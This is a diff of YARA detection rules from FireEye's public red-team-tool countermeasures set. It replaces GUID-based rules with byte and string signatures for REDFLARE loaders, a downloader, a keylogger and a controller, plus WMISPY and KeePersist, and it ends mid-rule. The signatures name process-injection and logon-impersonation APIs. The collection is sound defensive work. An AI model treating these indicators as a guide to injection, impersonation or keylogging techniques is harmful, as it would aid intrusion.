tags = "FILE" rev = 1 strings: - $sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 } - $sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 } - $ss1 = "\x00NtMapViewOfSection\x00" - $ss2 = "\x00NtOpenProcess\x00" - $ss3 = "\x00NtAlertResumeThread\x00" - $ss4 = "\x00LdrGetProcedureAddress\x00" - $tb1 = "\x00DTrim.Execution.DynamicInvoke\x00" + $const = "Cookie: SID1=%s" fullword + $http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [1-10] 6A 00 8B [1-8] 5? 6A 00 6A 00 6A 00 8B [1-8] 5? 68 [4] 8B [1-8] 5? FF 15 [4-40] 6A 14 E8 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and (@sb1[1]<@sb2[1]) and ( all of ($ss*)) and ( all of ($tb*)) + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_Loader_MSIL_Ruralbishop_3 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_4 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public RuralBishop project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "55a060ef-74e2-50d9-9090-558aaa04d97d" - date = "2020-12-09" + id = "6e8621b0-a0ee-5fc7-a2b8-1973a42d6e37" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_RuralBishop_3.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_4.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "09bdbad8358b04994e2c04bb26a160ef" - logic_hash = "a4c55dede432c249e36e96ca09555448b0343969d389bfdb4bd459fe34e05ea1" + hash = "a8b5dcfea5e87bf0e95176daa243943d, 9dcb6424662941d746576e62712220aa" + logic_hash = "d027e98ad8fa6d03a49ceffd81fba6a621173e2dbabae652bee2f4e8489bb378" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 3 + rev = 2 strings: - $typelibguid1 = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii nocase wide + $s1 = "LogonUserW" fullword + $s2 = "ImpersonateLoggedOnUser" fullword + $s3 = "runCommand" fullword + $user_logon = { 22 02 00 00 [1-10] 02 02 00 00 [0-4] E8 [4-40] ( 09 00 00 00 [1-10] 03 00 00 00 | 6A 03 6A 09 ) [4-30] FF 15 [4] 85 C0 7? } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_2 : FILE +rule FIREEYE_RT_APT_Downloader_Win64_REDFLARE_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "90ee2569-2e68-517b-b2d7-8c4015d92683" - date = "2020-12-03" - date = "2020-12-03" + id = "15a5e22b-84b0-5b36-8772-1d496ac447b2" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_2.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win64_REDFLARE_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "c0598321d4ad4cf1219cc4f84bad4094" - logic_hash = "4cccfca0c06954105f762066741b6c35599a6c28df8b7c255a2659059169578f" + hash = "9529c4c9773392893a8a0ab8ce8f8ce1" + logic_hash = "1b9bece6083403615841c752eac48fd20095e918d6e175563dd122be2885d875" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 2 strings: - $ss1 = "\x00NtMapViewOfSection\x00" - $ss2 = "\x00NtOpenProcess\x00" - $ss3 = "\x00NtAlertResumeThread\x00" - $ss4 = "\x00LdrGetProcedureAddress\x00" - $ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00" - $ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00" - $tb1 = "\x00DTrim.Execution.DynamicInvoke\x00" + $const = "Cookie: SID1=%s" fullword + $http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [6-20] 00 00 00 00 [6-20] 00 00 00 00 [2-10] 00 00 00 00 45 33 C9 [4-20] 48 8D 15 [4] 48 8B 0D [4] FF 15 [4-50] B9 14 00 00 00 E8 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_Loader_MSIL_Netassemblyinject_1 : FILE +rule FIREEYE_RT_APT_Controller_Linux_REDFLARE_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NET-Assembly-Inject' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "62a7dc4c-678b-5f13-9661-4679eafe1c72" - date = "2020-12-09" + id = "79a69740-7209-5c56-ad6f-eb4d0b29beaf" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETASSEMBLYINJECT/production/yara/Loader_MSIL_NETAssemblyInject_1.yar#L4-L17" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Controller_Linux_REDFLARE_1.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "9a43df9ee26a44f4db5c2d22fbc1a6c86c5af0c9d44a79c6627a4cc8cf31bb8d" + hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e" + logic_hash = "d6b0cc5f386da9bff8a8293f2b3857406044ab42f7c1bb23d5096052a3c42ce4" score = 75 - quality = 69 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "af09c8c3-b271-4c6c-8f48-d5f0e1d1cac6" ascii nocase wide - $typelibguid1 = "c5e56650-dfb0-4cd9-8d06-51defdad5da1" ascii nocase wide - $typelibguid2 = "e8fa7329-8074-4675-9588-d73f88a8b5b6" ascii nocase wide + $1 = "/RedFlare/gorat_server" + $2 = "RedFlare/sandals" + $3 = "goratsvr.CommandResponse" fullword + $4 = "goratsvr.CommandRequest" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint32(0)==0x464c457f) and all of them } -rule FIREEYE_RT_Tool_MSIL_Sharpgrep_1 : FILE +rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGrep' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "c7569d33-f57d-5f9c-aa2a-78866c680b5b" - date = "2020-12-09" + id = "b8a2c388-3b27-5075-b0ee-2773ae0c67ad" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPPGREP/production/yara/Tool_MSIL_SharpGrep_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "c22bfc50b3ab3c4082006aad3c3c89684cffe1e429b001b0bb08758856a47d04" + hash = "01d68343ac46db6065f888a094edfe4f" + logic_hash = "f9165aabe4bad215211cf98559099030ddb8a76175fbfcfee3c6f25d7614bdad" score = 75 - quality = 73 + quality = 75 tags = "FILE" rev = 1 strings: - $typelibguid0 = "f65d75b5-a2a6-488f-b745-e67fc075f445" ascii nocase wide + $alloc_n_load = { 6A 40 68 00 30 00 00 [0-20] 6A 00 [0-20] FF D0 [4-60] F3 A4 [30-100] 6B C0 28 8B 4D ?? 8B 4C 01 10 8B 55 ?? 6B D2 28 } + $const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_JUSTASK_1 : FILE +rule FIREEYE_RT_APT_Builder_PY_REDFLARE_2 { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'justask' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "06a03d82-db69-5b5a-a578-a8053814e917" - date = "2020-12-09" + id = "1af407f5-6eb7-5be9-a3d9-cd0f7a5f2503" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/JUSTASK/production/yara/APT_HackTool_MSIL_JUSTASK_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_2.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "24d2f8e3838c4f02cd80644a396ce7cf105761d2feba54e39973564ca5e97571" + hash = "4410e95de247d7f1ab649aa640ee86fb" + logic_hash = "675390e944a95156ad33ca783c90fdea9610cdc2e8c5c53e0c0fa213149b4714" score = 75 - quality = 73 - tags = "FILE" - rev = 2 + quality = 75 + tags = "" + rev = 1 strings: - $typelibguid0 = "aa59be52-7845-4fed-9ea5-1ea49085d67a" ascii nocase wide + $1 = "<510sxxII" + $2 = "0x43,0x00,0x3a,0x00,0x5c,0x00,0x57,0x00,0x69,0x00,0x6e,0x00,0x64,0x00,0x6f,0x00," + $3 = "parsePluginOutput" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + all of them and #2==2 } -rule FIREEYE_RT_Loader_MSIL_Sharpy_1 : FILE +rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_2 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharPy' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "7c7bda22-bacc-5901-a650-a30c9cfcdee7" - date = "2020-12-09" + id = "6a585401-bfd3-5aad-b484-09b6a30d9af5" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPY/production/yara/Loader_MSIL_SharPy_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_2.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "0f73fab3905b4961b8dbeb120d45a34a2383ecdaae0296f38e34f8b7ab4aeee8" + hash = "4e7e90c7147ee8aa01275894734f4492" + logic_hash = "98dfb71adbde4f8965e612c19f0965d8fa95805825569290fdf72eb1d86cfb70" score = 75 - quality = 73 + quality = 75 tags = "FILE" rev = 1 strings: - $typelibguid0 = "f6cf1d3b-3e43-4ecf-bb6d-6731610b4866" ascii nocase wide + $inject = { 83 F8 01 [4-50] 6A 00 6A 00 68 04 00 00 08 6A 00 6A 00 6A 00 6A 00 5? [10-70] FF 15 [4] 85 C0 [1-20] 6A 04 68 00 10 00 00 5? 6A 00 5? [1-10] FF 15 [4-8] 85 C0 [1-20] 5? 5? 5? 8B [1-4] 5? 5? FF 15 [4] 85 C0 [1-20] 6A 20 [4-20] FF 15 [4] 85 C0 [1-40] 01 00 01 00 [2-20] FF 15 [4] 85 C0 [1-30] FF 15 [4] 85 C0 [1-20] FF 15 [4] 83 F8 FF } + $s1 = "ResumeThread" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_DTRIM_1 : FILE +rule FIREEYE_RT_APT_Keylogger_Win64_REDFLARE_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'dtrim' project, which is a modified version of SharpSploit." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "9be695a1-6d18-5952-974c-96a30f035e7a" - date = "2020-12-09" + id = "3c980f5a-c775-5c25-ba28-91a93a1b9a85" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DTRIM/production/yara/APT_HackTool_MSIL_DTRIM_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win64_REDFLARE_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "357c1f76631ec9ee342995cd12369fd9ff18c541bffe6f5464b1e8db45057196" + hash = "fbefb4074f1672a3c29c1a47595ea261" + logic_hash = "26fe577ba637c484d9a8ccc2173b5892a76328a90a39a2bebbae6bd2a6329485" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "7760248f-9247-4206-be42-a6952aa46da2" ascii nocase wide + $create_window = { 41 B9 00 00 CF 00 [4-40] 33 C9 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 FF 15 } + $keys_check = { B9 14 00 00 00 FF 15 [4-8] B9 10 00 00 00 FF 15 [4] BE 00 80 FF FF 66 85 C6 75 ?? B9 A0 00 00 00 FF 15 [4] 66 85 C6 75 ?? B9 A1 00 00 00 FF 15 [4] 66 85 C6 74 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_Loader_MSIL_Allthethings_1 : FILE +rule FIREEYE_RT_APT_Loader_Raw64_REDFLARE_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'AllTheThings' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "1805b406-2531-56bf-8e08-e63a59ffcc84" - date = "2020-12-09" + id = "8e937f6a-404f-53bd-9de2-ed63b1cf48b2" + date = "2020-11-27" + date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ALLTHETHINGS/production/yara/Loader_MSIL_AllTheThings_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw64_REDFLARE_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "e3058095f2a49f8c0f78cb392024795367609b04c1da80210ab8d72c6613ee71" + hash = "5e14f77f85fd9a5be46e7f04b8a144f5" + logic_hash = "dac122ccece8a6dd35a5fe9d37860a612aa50ab469b79f4375dbe776f60c7b57" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "542ccc64-c4c3-4c03-abcd-199a11b26754" ascii nocase wide + $load = { EB ?? 58 48 8B 10 4C 8B 48 ?? 48 8B C8 [1-10] 48 83 C1 ?? 48 03 D1 FF } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)!=0x5A4D) and all of them } -rule FIREEYE_RT_Loader_MSIL_Csharpsectioninjection_1 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_7 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'C_Sharp_SectionInjection' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "ca5bf5cd-1950-53ed-8984-e880a15e658e" - date = "2020-12-09" + id = "f891e477-9ff2-57be-9ca5-dd87d9baee29" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSECTIONINJECTION/production/yara/Loader_MSIL_CSharpSectionInjection_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_7.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "011cf4dffe6ef90a79cdfabb0e297152c00b0404b1801f56fd7e703ab90b1692" + hash = "e7beece34bdf67cbb8297833c5953669, 8025bcbe3cc81fc19021ad0fbc11cf9b" + logic_hash = "6d7822256ac1bef05304d3396df773e2b20a397311ad820d6ec5fe4cb6bdfbbc" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "d77135da-0496-4b5c-9afe-e1590a4c136a" ascii nocase wide + $1 = "initialize" fullword + $2 = "getData" fullword + $3 = "putData" fullword + $4 = "fini" fullword + $5 = "NamedPipe" + $named_pipe = { 88 13 00 00 [1-8] E8 03 00 00 [20-60] 00 00 00 00 [1-8] 00 00 00 00 [1-40] ( 6A 00 6A 00 6A 03 6A 00 6A 00 68 | 00 00 00 00 [1-6] 00 00 00 00 [1-6] 03 00 00 00 45 33 C? 45 33 C? BA ) 00 00 00 C0 [2-10] FF 15 [4-30] FF 15 [4-7] E7 00 00 00 [4-40] FF 15 [4] 85 C0 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Hacktool_MSIL_Wmisharp_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Wmispy_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMISharp' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIspy' project." author = "FireEye" - id = "97b9d057-30d3-5af7-bac6-4dd53f47650f" + id = "ac394751-da40-564b-8e24-8f353326b46a" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISHARP/production/yara/HackTool_MSIL_WMISharp_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/HackTool_MSIL_WMIspy_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "d119d52c1410291d582696d5c4c1de3db9008db963c76a9e344959d869c3acc0" + logic_hash = "a5a9f7c7a7bfe474e8b21306ea220b4d476832f3ad4fafdd8967a2250d15a701" score = 75 quality = 73 tags = "FILE" rev = 1 strings: - $typelibguid0 = "3a2421d9-c1aa-4fff-ad76-7fcb48ed4bff" ascii nocase wide + $typelibguid0 = "5ee2bca3-01ad-489b-ab1b-bda7962e06bb" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_REVOLVER_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_WMISPY_2 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'revolver' project." + description = "wql searches" author = "FireEye" - id = "8fa5adb7-dc66-51bc-9f60-2308515f33a8" + id = "474af878-a657-54bc-a063-04532df928d4" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_HackTool_MSIL_REVOLVER_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/APT_HackTool_MSIL_WMISPY_2.yar#L4-L24" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "8df8a56ed55b7857adb95daa643d544a49eb5f1952b4ad3ef757c34dad2ce317" + hash = "3651f252d53d2f46040652788499d65a" + logic_hash = "553fc1e536482a56b3228a5c9ebac843af9083e8ac864bf65c81b36a39ca5e5e" score = 75 - quality = 71 + quality = 75 tags = "FILE" - rev = 2 + rev = 4 strings: - $typelibguid0 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide - $typelibguid1 = "b214d962-7595-440b-abef-f83ecdb999d2" ascii nocase wide + $MSIL = "_CorExeMain" + $str1 = "root\\cimv2" wide + $str2 = "root\\standardcimv2" wide + $str3 = "from MSFT_NetNeighbor" wide + $str4 = "from Win32_NetworkLoginProfile" wide + $str5 = "from Win32_IP4RouteTable" wide + $str6 = "from Win32_DCOMApplication" wide + $str7 = "from Win32_SystemDriver" wide + $str8 = "from Win32_Share" wide + $str9 = "from Win32_Process" wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and $MSIL and all of ($str*) } -import "pe" - -rule FIREEYE_RT_FE_APT_Loader_MSIL_REVOLVER_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Keepersist_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeePersist' project." author = "FireEye" - id = "d99620e0-39ed-58db-acce-0d885a9e0bf7" - date = "2020-12-18" - modified = "2020-12-18" + id = "950a4744-2696-5eb7-8524-7f689cb5dbb0" + date = "2020-12-09" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REVOLVER/production/yara/APT_Loader_MSIL_REVOLVER_1.yar#L5-L14" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEPERSIST/production/yara/HackTool_MSIL_KeePersist_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "1231f4c961dec122ebcb142052c2c7c03acf9b556cdb71a3efabde6bcf50a939" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "eae67c77a64ca07f9ef59a356bb2c3f3131f14e7f17c898ef8857a21090ace0e" score = 75 - quality = 75 + quality = 73 tags = "FILE" + rev = 2 strings: - $inject = { 28 [2] 00 06 0? 0? 7B [2] 00 04 7E [2] 00 0A 28 [2] 00 0A [2-40] 7E [2] 00 0A 0? 20 00 10 00 00 28 [2] 00 0A 0? 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E [2] 00 0A 1? ?? 20 00 30 00 00 1F 40 28 [2] 00 06 [2-40] 28 [2] 00 0A 1? 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 1? ?? 1? ?? 1? 0? 1? ?? 8? 6? 28 [2] 00 0A 1? ?? FE 15 [2] 00 02 1? ?? 72 [2] 00 70 28 [2] 00 06 1? ?? FE 15 [2] 00 02 1? ?? 1? ?? 1? 28 [2] 00 06 2? 7E [2] 00 0A 1? ?? 0? 7B [2] 00 04 1? ?? 1? 1? ?? 28 [2] 00 06 2? ?? 1? ?? 7E [2] 00 0A 28 [2] 00 0A [2-10] 7E [2] 00 0A 1? ?? 1? ?? 20 [2] 1F 00 7E [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 1? ?? 7E 